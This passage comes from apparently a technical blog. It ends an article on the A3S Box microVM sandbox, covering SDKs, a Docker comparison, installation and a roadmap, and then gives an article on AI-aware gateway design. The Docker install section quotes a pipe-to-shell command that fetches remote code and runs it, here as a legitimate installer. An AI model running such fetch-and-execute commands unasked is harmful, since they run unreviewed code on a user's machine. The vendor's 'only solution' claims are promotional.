Core logic is implemented once in Rust, then native bindings are generated via PyO3 (Python) and napi-rs (TypeScript/Node.js). This ensures the behavior of all three SDKs is completely consistent, while enjoying Rust's performance and safety.

19.2 Rust SDK

The Rust SDK is the lowest-level interface, providing complete type safety and zero-cost abstractions:

use a3s_box_sdk::{BoxSdk, SandboxOptions};

#[tokio::main]
async fn main() -> Result<()> {
    // Create SDK instance
    let sdk = BoxSdk::new(None)?;  // None = use default home_dir

    // Create sandbox
    let sandbox = sdk.create(Some(SandboxOptions {
        image: "python:3.11".to_string(),
        vcpus: 2,
        memory_mib: 1024,
        ..Default::default()
    })).await?;

    // Execute command
    let output = sandbox.exec(&["python", "-c", "print('hello')"]).await?;
    println!("{}", output.stdout);

    // Sandbox is automatically cleaned up on drop
    Ok(())
}

19.3 Python SDK

The Python SDK bridges via PyO3, providing a Pythonic async interface:

import asyncio
from a3s_box import BoxSdk, SandboxOptions

async def main():
    # Create SDK instance
    sdk = BoxSdk()

    # Create sandbox
    sandbox = sdk.create(SandboxOptions(
        image="python:3.11",
        vcpus=2,
        memory_mib=1024,
    ))

    # Execute command
    output = sandbox.exec(["python", "-c", "print('hello')"])
    print(output.stdout)

asyncio.run(main())

Key design decisions for PyO3 bindings:

Use py.allow_threads to release the GIL, ensuring Rust's async operations don't block Python's event loop
Maintain an internal Tokio Runtime to bridge Python's synchronous calls to Rust's async world
Type mapping: Rust's Result<T> -> Python exceptions, Rust's Option<T> -> Python's None

19.4 TypeScript SDK

The TypeScript SDK generates native Node.js modules via napi-rs:

import { BoxSdk, SandboxOptions } from '@a3s/box';

async function main() {
    // Create SDK instance
    const sdk = new BoxSdk();

    // Create sandbox
    const sandbox = await sdk.create({
        image: 'node:20',
        vcpus: 2,
        memoryMib: 1024,
    });

    // Execute command
    const output = await sandbox.exec(['node', '-e', 'console.log("hello")']);
    console.log(output.stdout);
}

main();

The advantage of napi-rs is that it generates a true native module (.node file), not via FFI or subprocess calls. This means:

Zero serialization overhead (data passed directly between V8 heap and Rust heap)
Complete TypeScript type definitions (auto-generated .d.ts)
Supports async/await (via Tokio and libuv integration)

19.5 Multi-Platform Builds

SDK native bindings need to be compiled separately for each target platform. A3S Box implements multi-platform builds via GitHub Actions CI matrix:

Platform	Python wheels	Node.js modules
Linux x86_64	maturin	napi-rs
Linux aarch64	maturin	napi-rs
macOS x86_64	maturin	napi-rs
macOS aarch64 (Apple Silicon)	maturin	napi-rs

Python wheels are built via maturin and published to PyPI; Node.js modules are built via napi-rs and published to npm. Users only need pip install a3s-box or npm install @a3s/box, and the package manager automatically selects the correct platform variant.

20. Comparative Analysis with Existing Solutions

20.1 Container Runtime Landscape

The current container runtime ecosystem can be divided into four levels by isolation strength:

Isolation strength ^
                   |
                   |  +------------------------------------------+
                   |  | A3S Box (TEE mode)                        |
                   |  | MicroVM + memory encryption + 7-layer defense |
                   |  +------------------------------------------+
                   |  +------------------------------------------+
                   |  | A3S Box (standard mode) / Kata Containers  |
                   |  | MicroVM + independent kernel               |
                   |  +------------------------------------------+
                   |  +------------------------------------------+
                   |  | gVisor                                     |
                   |  | Userspace kernel (syscall interception)    |
                   |  +------------------------------------------+
                   |  +------------------------------------------+
                   |  | runc (Docker default)                      |
                   |  | Shared kernel + namespace + cgroup         |
                   |  +------------------------------------------+
                   |
                   +-------------------------------------------> Performance overhead

20.2 Detailed Comparison

Dimension	runc (Docker)	gVisor	Kata Containers	Firecracker	A3S Box
Isolation mechanism	namespace + cgroup	Userspace kernel	MicroVM (QEMU/CLH)	MicroVM (KVM)	MicroVM (libkrun)
Kernel isolation	Shared	Partial (Sentry)	Independent	Independent	Independent
Cold start	~50ms	~150ms	~500ms-2s	~125ms	~200ms
Memory overhead	~5 MB	~15 MB	~30-50 MB	~5 MB	~10 MB
TEE support	No	No	Limited	No	Yes (SEV-SNP, TDX planned)
macOS support	Yes (Docker Desktop)	No	No	No	Yes (native HVF)
Docker CLI compat	Native	Partial	Via shimv2	No	Yes (52 commands)
K8s integration	CRI	CRI	CRI	containerd-shim	CRI
Language	Go	Go	Go + Rust	Rust	Rust
Embedded SDK	No	No	No	Yes (Rust)	Yes (Rust/Python/TS)
Audit logs	No	No	No	No	Yes (26 operations)
Warm pool	N/A	N/A	No	No	Yes (auto-scaling)
RA-TLS	No	No	No	No	Yes
Sealed storage	No	No	No	No	Yes (3 policies)
Daemon required	Yes (dockerd)	Yes (runsc)	Yes (shimv2)	Yes (firecracker)	No daemon
Binary size	~200 MB (full)	~50 MB	~100 MB+	~30 MB	~40 MB (single binary)
Dependencies	dockerd + containerd + runc	containerd + runsc	containerd + shimv2 + QEMU	firecracker + jailer	Single binary, zero external deps

20.3 A3S Box vs Docker: Deep Comparison

Docker is the de facto standard of the container ecosystem and the tool most developers are familiar with. A deep comparison of A3S Box with Docker helps understand A3S Box's differentiated value.

20.3.1 Architecture Difference: Daemonless vs Daemon Model

Docker uses a classic client-server architecture:

Docker architecture:
  docker CLI --> dockerd (daemon, always running in background)
                    |
                    +-- containerd (container lifecycle management)
                    |       |
                    |       +-- containerd-shim
                    |               |
                    |               +-- runc (OCI runtime)
                    |                     |
                    |                     +-- container process
                    |
                    +-- network/storage/logging plugins

This architecture means:

Must run dockerd daemon (typically with root privileges)
dockerd is a single point of failure — if the daemon crashes, management capability for all containers is lost
The daemon itself is a high-value attack target (root privileges + controls all containers)
Upgrading Docker requires restarting the daemon, potentially affecting running containers

A3S Box uses a daemonless architecture:

A3S Box architecture:
  a3s-box CLI --> directly starts shim subprocess
                        |
                        +-- libkrun (library call, not separate process)
                                |
                                +-- MicroVM (independent kernel)
                                        |
                                        +-- Guest Init (PID 1)
                                                |
                                                +-- application process

Advantages of daemonless:

No single point of failure: Each MicroVM is managed by an independent shim subprocess; one VM's management process crashing doesn't affect other VMs
No privileged daemon: Eliminates the Docker daemon as a high-value attack target
Zero operational overhead: No need to manage daemon startup, monitoring, log rotation
Ready to use: No systemctl start docker needed; just execute the command directly

20.3.2 Size Comparison: 40MB vs 200MB+

Component	Docker	A3S Box
CLI	docker (~50 MB)	a3s-box (~40 MB, includes all features)
Runtime daemon	dockerd (~80 MB)	Not needed
Container management	containerd (~50 MB)	Built-in
OCI runtime	runc (~10 MB)	Built-in (libkrun)
Network plugins	CNI plugins (~20 MB)	Built-in
Total	~200 MB+	~40 MB

A3S Box compiles all functionality into a single Rust binary with no external dependencies. This means:

Minimal deployment: Copy one file to complete installation, no package manager needed
Simple version management: One binary = one version, no component version incompatibility issues
Offline deployment friendly: In environments without network, only need to transfer a 40MB file
CI/CD cache efficient: Caching one file is much faster than caching an entire Docker installation

20.3.3 Security Model Comparison

Docker's isolation boundary:
+-------------------------------------+
|       Host Linux Kernel              |  <- All containers share this
|  +---------+  +---------+           |
|  | Cont. A  |  | Cont. B  |          |
|  | ns+cgroup|  | ns+cgroup|          |
|  +---------+  +---------+           |
|                                     |
|  Kernel vulnerability = all containers compromised  |
+-------------------------------------+

A3S Box's isolation boundary:
+-------------------------------------+
|       Host Linux Kernel              |
|  +--------------+  +--------------+ |
|  | MicroVM A     |  | MicroVM B     | |
|  | +----------+ |  | +----------+ | |
|  | |Indep.    | |  | |Indep.    | | |
|  | |kernel    | |  | |kernel    | | |
|  | |app proc  | |  | |app proc  | | |
|  | +----------+ |  | +----------+ | |
|  | HW virt boundary|  | HW virt boundary| |
|  +--------------+  +--------------+ |
|                                     |
|  VM A kernel vuln != VM B affected  |
+-------------------------------------+

Key security differences:

Security Dimension	Docker	A3S Box
Kernel sharing	All containers share host kernel	Each VM has independent kernel
Escape impact	One container escape -> control all containers	One VM escape -> only affects that VM
Privileged daemon	dockerd runs as root	No daemon
Memory encryption	No	Yes (TEE, SEV-SNP)
Remote attestation	No	Yes (RA-TLS)
Audit logs	Basic (Docker events)	Complete (26 operations, W7 model)
Default Seccomp	Allows ~300 syscalls	Blocks 16 dangerous calls + arch validation
Default Capabilities	Retains 14	All stripped

20.3.4 Startup Speed Comparison

Docker container startup (~50ms):
  [0ms]  dockerd receives request
  [5ms]  containerd creates container
  [10ms] runc sets up namespace + cgroup
  [20ms] pivot_root switches root filesystem
  [30ms] application process starts
  [50ms] ready

A3S Box MicroVM startup (~200ms):
  [0ms]   CLI receives request
  [20ms]  start shim subprocess
  [50ms]  libkrun creates VM + kernel boot
  [150ms] Guest Init mounts filesystems
  [180ms] configure network + start vsock servers
  [200ms] ready

A3S Box warm pool mode (~0ms):
  [0ms]   CLI receives request
  [0ms]   acquire ready VM from warm pool
  [0ms]   ready

Docker's startup speed is indeed faster (~50ms vs ~200ms), but the 150ms difference buys:

Upgrade from shared-kernel isolation to hardware virtualization isolation
Optional TEE memory encryption
Independent kernel (kernel vulnerabilities don't spread)

For latency-sensitive scenarios, the warm pool mechanism can reduce effective startup time to near zero.

20.3.5 Developer Experience Comparison

Dimension	Docker	A3S Box
Installation	Need to install Docker Desktop (macOS/Windows) or docker-ce (Linux)	Download single binary, no installation needed
macOS support	Via Docker Desktop (requires HyperKit/VZ virtualization layer)	Native Apple HVF, no intermediate layer
Command compat	Native	52 compatible commands, consistent syntax
Dockerfile	Native support	Compatible with OCI image format
SDK embedding	Via Docker API (HTTP REST)	Native Rust/Python/TypeScript SDK
Resource usage	Docker Desktop resident memory ~1-2 GB	No resident process, start on demand
License	Docker Desktop requires payment for commercial use	MIT open source

For developers, the cost of migrating from Docker to A3S Box is minimal:

# Before migration
docker run -d --name web -p 8080:80 nginx
docker exec web curl localhost
docker logs web
docker stop web && docker rm web

# After migration (just replace the command name)
a3s-box run -d --name web -p 8080:80 nginx
a3s-box exec web curl localhost
a3s-box logs web
a3s-box stop web && a3s-box rm web

20.3.6 Installation Method Comparison

Docker installation varies by platform and typically requires multiple steps:

# Docker on macOS -- requires downloading ~1GB Docker Desktop installer
# 1. Download Docker Desktop .dmg
# 2. Drag to install
# 3. Start Docker Desktop (resident in background, uses 1-2 GB memory)
# 4. Wait for dockerd to finish starting

# Docker on Linux -- requires configuring apt/yum repository
curl -fsSL https://get.docker.com | sh
sudo systemctl enable --now docker
sudo usermod -aG docker $USER
# Need to re-login to shell for changes to take effect

A3S Box provides multiple lightweight installation methods, each completing in seconds:

# Method 1: Homebrew (macOS / Linux)
brew tap A3S-Lab/homebrew-tap https://github.com/A3S-Lab/homebrew-tap.git
brew install a3s-box
# Automatically downloads pre-compiled binary from GitHub Releases
# Includes a3s-box CLI + a3s-box-shim + a3s-box-guest-init
# Done. No daemon, no restart needed, immediately usable.

# Method 2: Cargo (Rust developers)
cargo install a3s-box
# Compile and install from source, automatically gets latest version

# Method 3: Helm (Kubernetes cluster)
helm repo add a3s https://a3s-lab.github.io/charts
helm install a3s-box a3s/a3s-box
# Deploy as DaemonSet in K8s cluster, automatically runs on each node

# Method 4: Direct binary download (GitHub Releases)
# macOS Apple Silicon:
curl -L https://github.com/A3S-Lab/Box/releases/latest/download/a3s-box-latest-macos-arm64.tar.gz | tar xz
# Linux x86_64:
curl -L https://github.com/A3S-Lab/Box/releases/latest/download/a3s-box-latest-linux-x86_64.tar.gz | tar xz
./a3s-box version
# Extract and use, zero dependencies

Installation Method	Use Case	Install Time	Dependencies
Homebrew	macOS/Linux daily development	~10 seconds	Homebrew
Cargo	Rust developers, source compilation	~2 minutes	Rust toolchain
Helm	Kubernetes cluster deployment	~30 seconds	Helm + K8s
Direct download	CI/CD, offline environments, edge devices	~5 seconds	None

For more installation details and configuration options, see the official documentation: https://a3s-lab.github.io/a3s/

Compared to Docker Desktop's installation experience (download 1GB -> install -> start daemon -> wait for ready), A3S Box's installation can be summarized in one word: instant.

20.3.7 When to Choose Docker, When to Choose A3S Box?

Choose Docker when:

Extremely latency-sensitive (P99 < 100ms) and not using warm pool
Deep integration with Docker API toolchain with high migration cost
Hardware-level isolation not needed (e.g., internal development environments, trusted workloads)
Need Docker Compose to orchestrate multi-container applications

Choose A3S Box when:

Running untrusted code (AI Agents, user-submitted code, third-party plugins)
Multi-tenant environments requiring strong isolation guarantees
Processing sensitive data requiring TEE confidential computing
Need complete audit trail (compliance requirements)
macOS development environment without wanting to install Docker Desktop
Edge/IoT deployment requiring minimal binary size
Need to embed sandbox capability into applications (SDK integration)

20.4 Scenario Applicability Analysis

Scenario 1: Development and Testing Environments

Recommended: A3S Box (TSI mode) or Docker

A3S Box provides native support on macOS via Apple HVF; developers don't need to install Docker Desktop. 52 compatible commands make migration cost nearly zero. TSI network mode requires zero configuration, suitable for rapid iteration.

Scenario 2: Multi-Tenant SaaS Platforms

Recommended: A3S Box (Bridge mode + TEE)

Multi-tenant scenarios require strong isolation guarantees. A3S Box's hardware virtualization + TEE memory encryption provides the highest level of tenant isolation. Network policies support traffic isolation between tenants. Audit logs meet compliance requirements.

Scenario 3: AI Agent Sandbox Execution

Recommended: A3S Box (warm pool + SDK)

AI Agents need to execute untrusted code in isolated environments. A3S Box's SDK provides a unified programming interface for Rust/Python/TypeScript, and the warm pool mechanism eliminates cold start latency. The seven-layer security model ensures that even if Agent-generated code is malicious, it cannot escape the sandbox.

Scenario 4: Confidential Data Processing

Recommended: A3S Box (TEE mode + sealed storage)

When processing medical records, financial data, or personal privacy information, TEE mode ensures data remains encrypted throughout processing. RA-TLS provides end-to-end attestation and encrypted communication. Sealed storage ensures persisted data can only be decrypted in trusted environments.

Scenario 5: High-Performance Computing / Low-Latency Services

Recommended: runc (Docker) or gVisor

If security isolation is not the primary requirement and latency is extremely sensitive (P99 < 10ms), traditional containers' ~50ms startup time and lower runtime overhead may be more appropriate.

20.5 A3S Box's Unique Positioning

From the comparison, A3S Box's unique positioning is:

The only solution supporting both MicroVM isolation and TEE confidential computing: Kata Containers has limited TEE support, but not as complete as A3S Box (lacking RA-TLS, sealed storage, re-attestation)
The only MicroVM solution with native macOS support: Through libkrun + Apple HVF, developers can get an experience on Mac consistent with Linux production environments
The only MicroVM solution providing three-language SDKs: Rust/Python/TypeScript SDKs allow A3S Box to be embedded into applications as a library, not just a command-line tool
The only MicroVM solution with a built-in complete audit system: 26 audit operations, W7 model, pluggable backend

21. Future Outlook and Summary

21.1 Technical Evolution Roadmap

A3S Box's technical evolution revolves around three directions:

Direction 1: Expand TEE Hardware Support

A3S Box currently fully supports AMD SEV-SNP. Intel TDX (Trust Domain Extensions) support has been reserved in the architecture (the TeeConfig::Tdx variant is already defined) and will be implemented when Intel server platforms are more widely deployed. Future attention will also be paid to emerging confidential computing standards like ARM CCA (Confidential Compute Architecture).

Direction 2: Enhanced Network Policy Enforcement

The current network policies (IsolationMode::Strict and Custom) are fully defined in the data model, but runtime enforcement is not yet implemented. Future work will implement true network policy enforcement via iptables/nftables integration, supporting:

Fine-grained traffic control between MicroVMs
Label-based network segmentation
Port-level filtering of inbound/outbound traffic
Semantic alignment with Kubernetes NetworkPolicy

Direction 3: Deepening Security Capabilities

Custom Seccomp profiles: Currently supports Default and Unconfined modes; future will support Custom mode, allowing users to provide custom Seccomp BPF profiles
AppArmor / SELinux integration: The CLI currently parses these options but doesn't enforce them; future will implement complete MAC (Mandatory Access Control) integration
Image signature mandatory verification: The signature verification framework is ready (SignaturePolicy, VerifyResult); future will integrate with the Sigstore/cosign ecosystem

21.2 Ecosystem Expansion

OCI image building: The a3s-box build command has been reserved via feature gate, and will support building OCI images inside MicroVMs — meaning the build process itself is protected by hardware isolation, preventing malicious Dockerfiles from attacking the host.

Kubernetes Operator maturation: The current BoxAutoscaler CRD is at the v1alpha1 stage and will progressively evolve to v1beta1 and v1, adding more automated operations capabilities:

Rolling update strategies
Canary releases
Automatic failure recovery
Cross-availability-zone scheduling

Observability enhancements:

More granular Prometheus metrics (network I/O, disk I/O, vsock latency)
Built-in Grafana dashboard templates
Real-time streaming of audit events (WebSocket / gRPC stream)

21.3 Performance Optimization Directions

Startup time optimization: Although 200ms cold start is already fast, there is still room for optimization:

Kernel trimming: Remove kernel modules not needed by MicroVMs, reducing kernel boot time
Snapshot restore: Save initialized VM snapshots, restore from snapshot rather than starting from scratch
Parallel initialization: Guest Init's steps execute in parallel where possible

Memory optimization:

KSM (Kernel Same-page Merging): When multiple MicroVMs run the same image, share identical memory pages
Memory balloon: Dynamically adjust VM memory allocation, reclaim unused memory
Lazy memory allocation: Only allocate physical memory pages when the VM actually accesses them

21.4 Summary

A3S Box represents a paradigm shift in container runtimes. It doesn't patch existing container technology, but starts from the fundamental question "what is the essence of workload isolation" and arrives at a clear answer:

Every workload should run on its own operating system kernel, with hardware virtualization providing isolation guarantees, confidential computing providing data protection, while maintaining container-level startup speed and developer experience.

The realization of this answer depends on several key technical choices:

libkrun as VMM: Library-form embedding, native macOS/Linux dual-platform support, ~200ms cold start
Rust as implementation language: Memory safety, zero-cost abstractions, cross-platform compilation, PyO3/napi-rs ecosystem
Minimal core + external extensions architecture: 5 core components remain stable, 14 extension points can evolve independently
Seven-layer defense in depth: From hardware encryption to syscall filtering, each layer independently increases attack cost
Docker-compatible user experience: 52 commands, zero migration cost

A3S Box's 1,466 tests (covering 218 source files) ensure the correct implementation of these technical choices. And its modular design — seven crates each with their own responsibilities, loosely coupled through Trait interfaces — ensures the system can continue to evolve without losing control.

In the AI Agent era, a secure code execution environment is no longer optional but foundational infrastructure. A3S Box is the runtime built for this era — it runs every line of untrusted code in a hardware-isolated sandbox, protects every byte of sensitive data with hardware encryption, while making developers feel like they're using Docker.

A3S Box — Making security the default, not the option.

Documentation: https://a3s-lab.github.io/a3s/ | GitHub: https://github.com/A3S-Lab/Box

Your nginx Is Killing Your AI Service — Why You Need to Redesign the Traffic Layer

Roy Lin — Mon, 23 Feb 2026 18:46:51 +0000

Four numbers define the problem this article addresses:

3 seconds: The maximum wait time users can tolerate — churn spikes sharply beyond this threshold.

47 seconds: The median time for a 70B model to complete a full inference pass on an A100.

0.3 seconds: The time for that same model to output its first token.

$2.48: The on-demand price of one A100 GPU per hour. If it sits idle at 3 AM, that money is gone.

The tension between these four numbers is the most fundamental engineering problem in AI infrastructure: users demand instant responses, models need time to think, compute must be precisely scheduled — and the traditional traffic layer knows nothing about any of this.

The Life of a Request: What nginx Is Doing
Fault Line 1: A Response Is Not a Packet, It Is a River
Fault Line 2: The Backend May Not Exist Yet
Fault Line 3: You Never Know If the New Model Got Dumber
Fault Line 4: Connections Are Not Disposable
Fault Line 5: Inference Fails Differently Than HTTP 500
Redesigning: What an AI Traffic Layer Needs
How A3S Gateway Addresses the Five Fault Lines
A Real Comparison With Existing Solutions
In Practice: Configuring a Full Proxy for an AI Backend
Autoscaling: The Principles Behind the Numbers

1. The Life of a Request: What nginx Is Doing

Let us start with the most basic question: when a request enters nginx, what is nginx actually doing?

Client  ──→  nginx  ──→  Backend  ──→  nginx  ──→  Client
               ↑                          ↑
       Receives full response       Forwards to client

The core model of nginx is proxy buffering. Its default behavior is:

Receive the complete response body from upstream
Cache it to local memory or a temporary file
Then send the cached content to the client

This design made perfect sense in 2004. HTTP responses were static files, database query results, template rendering output — they were complete at the moment of generation, and only needed a buffer to handle client network jitter.

But LLM responses do not work that way.

An LLM inference server behaves more like this:

Backend (vLLM / llama.cpp):
  t=0ms:     Receives request, begins inference
  t=300ms:   Generates first token: "Of"
  t=400ms:   Generates second token: "course"
  t=500ms:   Generates third token: ","
  ...
  t=47000ms: Generates last token, inference complete

If nginx has proxy buffering enabled (the default), what the user sees is:

User side:
  t=0ms:     Sends request
  t=47300ms: Receives all 4096 tokens at once

47 seconds of blank screen. Then text cascades down all at once.

The user has already closed the tab.

nginx does provide a way to disable buffering: proxy_buffering off. But that is just the beginning — when you actually run AI services in production, you will find this is the easiest of the five fault lines to solve.

2. Fault Line 1: A Response Is Not a Packet, It Is a River

After turning off proxy buffering, streaming appears to be solved. But the word "streaming" hides a lot of detail.

SSE (Server-Sent Events) is the standard protocol for LLM streaming output. A well-formed SSE stream looks like this:

data: {"id":"chatcmpl-xxx","choices":[{"delta":{"content":"Of"},"index":0}]}

data: {"id":"chatcmpl-xxx","choices":[{"delta":{"content":" course"},"index":0}]}

data: [DONE]

Each line is an event, separated by two newlines. The problem is: TCP does not guarantee packet boundaries. Under high concurrency, the network stack may merge multiple SSE events into one TCP packet, or split one event across multiple packets.

What an nginx with "proxy buffering off" does is: forward the bytes received from upstream as-is. This works in most cases, but:

Connection keepalive: nginx needs to know when one response ends and the next begins. For regular HTTP, this is controlled by Content-Length or Transfer-Encoding: chunked. For SSE, the connection stays open for the entire conversation — nginx's default timeouts may cut the connection while the model is still thinking.
Degradation under memory pressure: When nginx's memory pool fills up (say, 500 concurrent streaming requests), it silently re-enables buffering. Your monitoring sees normal 200 responses; users see latency suddenly spike.
Unpredictable response size: nginx's proxy_max_temp_file_size has a default upper limit. A full token stream from a long conversation may exceed it.

True zero-buffer streaming requires treating streams as a first-class citizen at the design level of the entire proxy layer — not patching a Web proxy after the fact.

From an implementation perspective, the difference is very concrete:

// Zero-buffer SSE forwarding: forward whatever arrives, no accumulation
async fn forward_streaming(
    mut upstream: Response<Incoming>,
    sender: &mut ResponseSender,
) {
    while let Some(chunk) = upstream.body_mut().frame().await {
        if let Ok(frame) = chunk {
            // Each frame is sent immediately, without waiting for the next
            sender.send_data(frame.into_data().unwrap()).await.ok();
        }
    }
}

Contrast this with a buffered proxy:

// Buffered proxy: wait for everything before sending
let body_bytes = hyper::body::to_bytes(upstream.body_mut()).await?;
// The user waits here for the entire inference duration
response.body(body_bytes)

This is an architectural choice, not a configuration option.

3. Fault Line 2: The Backend May Not Exist Yet

At 3 AM, no users are accessing your LLM service. Kubernetes HPA scales the GPU instances down to zero — because keeping one A100 on standby all day costs roughly $1,800 extra per month.

At 9 AM, the first user opens a chat window, types a message, and hits send.

When this request reaches the gateway, how many healthy backend instances are there? Zero.

What does nginx return? 502 Bad Gateway.

What does the user do? Refresh, try again, another 502. If it is an internal enterprise tool, they go to Slack and ask "is the service down?" If it is a consumer product, they have probably already left.

The root cause is not in the Kubernetes configuration or the HPA policy — it is in how the gateway handles the fact that the backend does not exist.

The mental model of a traditional gateway is: the backend is always there. The gateway is a traffic mover, not a scheduling center. When the backend is absent, the only option is to error.

AI services need a different mental model: requests can wait.

Not indefinitely — you need a reasonable timeout and queue depth. But during model startup (typically 30–60 seconds), requests should queue in memory rather than be dropped immediately. This pattern is called cold-start buffering.

User request (09:00:00)
    ↓
Gateway: detects zero backends → triggers scale-up → request enters memory queue
    ↓
Kubernetes brings up GPU instance (09:00:45)
    ↓
Instance passes health check (09:01:00)
    ↓
Gateway dequeues request → sends to backend → user receives first token at 09:01:03

The user experiences 63 seconds of "thinking", not a 502 error. That is a world of difference in user experience.

This capability requires the gateway to be aware of the autoscaling system — it must know when to trigger scale-up, when the backend is ready, and how to replay queued requests. These are things nginx was never designed to handle.

4. Fault Line 3: You Never Know If the New Model Got Dumber

Software deployment has one saving grace: code is static and can be fully tested. You run unit tests, integration tests, and end-to-end tests in CI. If they all pass, you have reason to believe the deployment is safe.

Models do not have this saving grace.

You can have an eval suite that validates accuracy improved from 87% to 89% across 1,000 questions. But real user questions follow a long-tail distribution — how much of that tail does your eval cover? When users ask questions in their own language and their own context, what does the new model do?

No static test can answer this question. The only answer lives in real traffic.

This is why AI teams need canary releases — not the blue-green deployments of Web development where new and old code run the same logic, but genuinely routing a fraction of real user requests to the new model and observing its behavior in the wild.

But canary releases are dangerous on their own, unless paired with automatic rollback:

Deploying v2 (new model):
  Minute 1: v1 gets 98% traffic, v2 gets 2%
    → v2 error rate: 0.8% (normal), latency: 1.2s (normal)
  Minute 2: v1 gets 90%, v2 gets 10%
    → v2 error rate: 1.1% (normal), latency: 1.3s (normal)
  Minute 3: v1 gets 80%, v2 gets 20%
    → v2 error rate: 8.7% ← exceeds threshold of 5%
    → Auto-rollback: v1 gets 100% traffic, v2 taken offline
    → Alert sent to on-call

This capability requires the gateway to do version-aware traffic splitting, metric aggregation, and threshold evaluation at the traffic layer — something that can never be implemented with nginx config files.

There is also an earlier validation technique: traffic mirroring. Before routing any traffic to the new model, copy 5% of real requests and send them to it, but only return the primary model's response to users. The new model's responses are discarded, but you can log them for offline analysis — how does it perform on real traffic? Where does it diverge from the primary model?

This is the only way to validate new model quality under "zero-risk" conditions.

5. Fault Line 4: Connections Are Not Disposable

The lifecycle of a traditional HTTP API:

Client sends request → Server processes → Returns response → Connection closes

Each request is independent. Connections are short-lived. The gateway is a stateless router.

AI application connections take different forms:

Conversational AI: A conversation between a user and a model can last tens of minutes. If implemented over HTTP, each turn is an independent request — that is fine. But if using WebSocket — because you need bidirectional push, such as letting users send a "stop" command while the model is still generating — the gateway needs to maintain the state of this long-lived connection, not treat it as a plain TCP stream after the handshake.

Streaming Agents: An AI agent may continuously push progress updates to the client while executing a task. This is not request-response; it is an event stream that lasts minutes.

Real-time Voice: Voice AI requires bidirectional low-latency streams — upstream audio while the user speaks, downstream audio as the model outputs. This is WebSocket or QUIC, not HTTP.

Traditional gateways treat WebSocket as a special case that needs to be "supported". But in AI applications, persistent connections are the norm, and short request-response cycles are the exception.

6. Fault Line 5: Inference Fails Differently Than HTTP 500

A Web API fails typically because:

The database went down
Code threw an exception
A dependency service timed out

These failures are fast: requests fail within milliseconds, and the gateway's timeout and retry policies can handle them.

AI inference failure modes are completely different:

Out-of-memory (OOM): The model exhausts GPU memory while processing an especially long context. The request does not fail immediately — it may first slow down (GPU starts swapping), then return an empty response or 500 after 30 seconds.
Output degeneration: The model starts generating gibberish or infinitely repeating content. From an HTTP perspective, this is a successful 200 response — but it is harmful.
Inference timeout: A complex inference request may legitimately take 2 minutes, but sometimes gets stuck in a loop and never finishes. The gateway's timeout needs to distinguish between "normally slow requests" and "stuck requests".

This means the gateway's health judgment cannot rely solely on HTTP status codes. Passive health checks (judging backend health based on the actual success rate of real requests) reflect the true state of AI backends better than active /health probes.

When a backend starts frequently experiencing OOM or timeouts, the gateway needs to automatically reduce traffic sent to that instance, or even temporarily remove it from the load balancing pool — not waiting for a health check to fail, but based on real-time error rates and latency.

7. Redesigning: What an AI Traffic Layer Needs

Putting the five fault lines together, an AI-native gateway needs to address these five things by design:

Zero-buffer streaming

Not "supporting SSE", but treating streams as a first-class citizen at the memory model level. Every byte is forwarded the instant it arrives from upstream, without passing through any local buffer. This requires the proxy layer's underlying implementation to use async I/O and zero-copy forwarding.

Cold-start request buffering

The gateway must know the current replica count of the backend, trigger scale-up when replicas are zero, and place requests in a memory queue. When replicas are ready, queued requests must be replayed in the correct order, carrying the original timeout deadline (a request that has already waited 30 seconds should not get a full inference timeout on top of that).

Version-aware traffic splitting with automatic rollback

The gateway needs to maintain independent metrics per backend version (error rate, latency percentiles), and decide whether to advance, pause, or roll back based on configured thresholds. This decision loop must close inside the gateway, without depending on external system coordination.

Persistent connections as first-class citizens

WebSocket handshakes, protocol upgrades, bidirectional stream forwarding — these must use the same efficient code paths as HTTP proxying, not be hacked onto the back of an HTTP proxy.

Passive health management based on real-time behavior

Active probes plus passive error rate tracking — both are required. When an instance's error rate exceeds a threshold over the past 60 seconds, it should be temporarily removed from the load balancing pool until the error rate recovers.

8. How A3S Gateway Addresses the Five Fault Lines

Zero-Buffer SSE Forwarding

A3S Gateway uses a dedicated streaming client for streaming requests, based on reqwest's streaming response interface, with tcp_nodelay and a 90-second connection pool keepalive:

// When an SSE/streaming request is detected, switch to the zero-buffer path
let is_sse = is_streaming_request(req.headers());
if is_sse {
    // streaming_client does not accumulate the response body
    // each chunk is forwarded as it arrives from upstream
    return stream_response(streaming_client, req, backend).await;
}

Every token travels from model output to client receipt with no buffering layer in between.

Cold-Start Request Buffering

When min_replicas = 0, the gateway places requests in a bounded queue (RequestBuffer) when replicas are zero, triggers scale-up, waits for replicas to pass health checks, then replays requests:

services "llm-backend" {
  scaling {
    min_replicas          = 0      # allow scale-to-zero
    max_replicas          = 4
    container_concurrency = 10     # max 10 concurrent requests per replica
    buffer_enabled        = true   # enable cold-start buffering
    executor              = "box"  # use A3S Box to manage replicas
  }
}

Scale-up triggering uses Knative's formula:

desired_replicas = ceil( (in_flight + queue_depth) / (container_concurrency x target_utilization) )

Version Traffic Splitting and Automatic Rollback

services "llm-service" {
  revisions = [
    { name = "v1", traffic_percent = 95, servers = [{ url = "http://v1:8080" }] },
    { name = "v2", traffic_percent = 5,  servers = [{ url = "http://v2:8080" }] },
  ]

  rollout {
    from                 = "v1"
    to                   = "v2"
    step_percent         = 10          # increase by 10% per step
    step_interval_secs   = 60          # one step every 60 seconds
    error_rate_threshold = 0.05        # rollback if error rate exceeds 5%
    latency_threshold_ms = 5000        # rollback if p99 exceeds 5s
  }
}

Traffic splitting and rollback decisions close inside the gateway, without depending on an external control plane.

Traffic Mirroring

services "llm-service" {
  mirror {
    service    = "llm-v2-shadow"  # shadow backend
    percentage = 10               # copy 10% of real requests
  }
  # Mirroring is fire-and-forget:
  # - does not wait for the shadow backend response
  # - does not expose shadow backend errors to users
  # - mirror requests are sent asynchronously, no impact on primary path latency
}

Passive Health Management

Each backend instance has an independent error rate tracker. When an instance's error rate exceeds a threshold within a sliding window, it is marked unhealthy and removed from the load balancing pool. When the error rate recovers, it rejoins:

services "llm-service" {
  load_balancer {
    strategy = "least-connections"  # actively route to the least-loaded instance
    health_check {
      path     = "/health"
      interval = "10s"
    }
  }
}
# Passive health checks are always on:
# 5 consecutive 5xx or timeouts → instance temporarily removed from load balancing
# 2 consecutive successes → instance rejoins

9. A Real Comparison With Existing Solutions

	nginx	Traefik	Envoy	A3S Gateway
SSE zero-buffer	Requires manual config, has pitfalls	Supported	Supported	Native, architecture-level guarantee
Cold-start request buffering	No	No	No	Yes
Version traffic splitting	No	No	Requires Istio	Yes (built-in)
Automatic rollback	No	No	Requires external system	Yes (built-in)
Traffic mirroring	Limited	Limited	Supported	Yes
Passive health checks	Limited	Limited	Supported	Yes
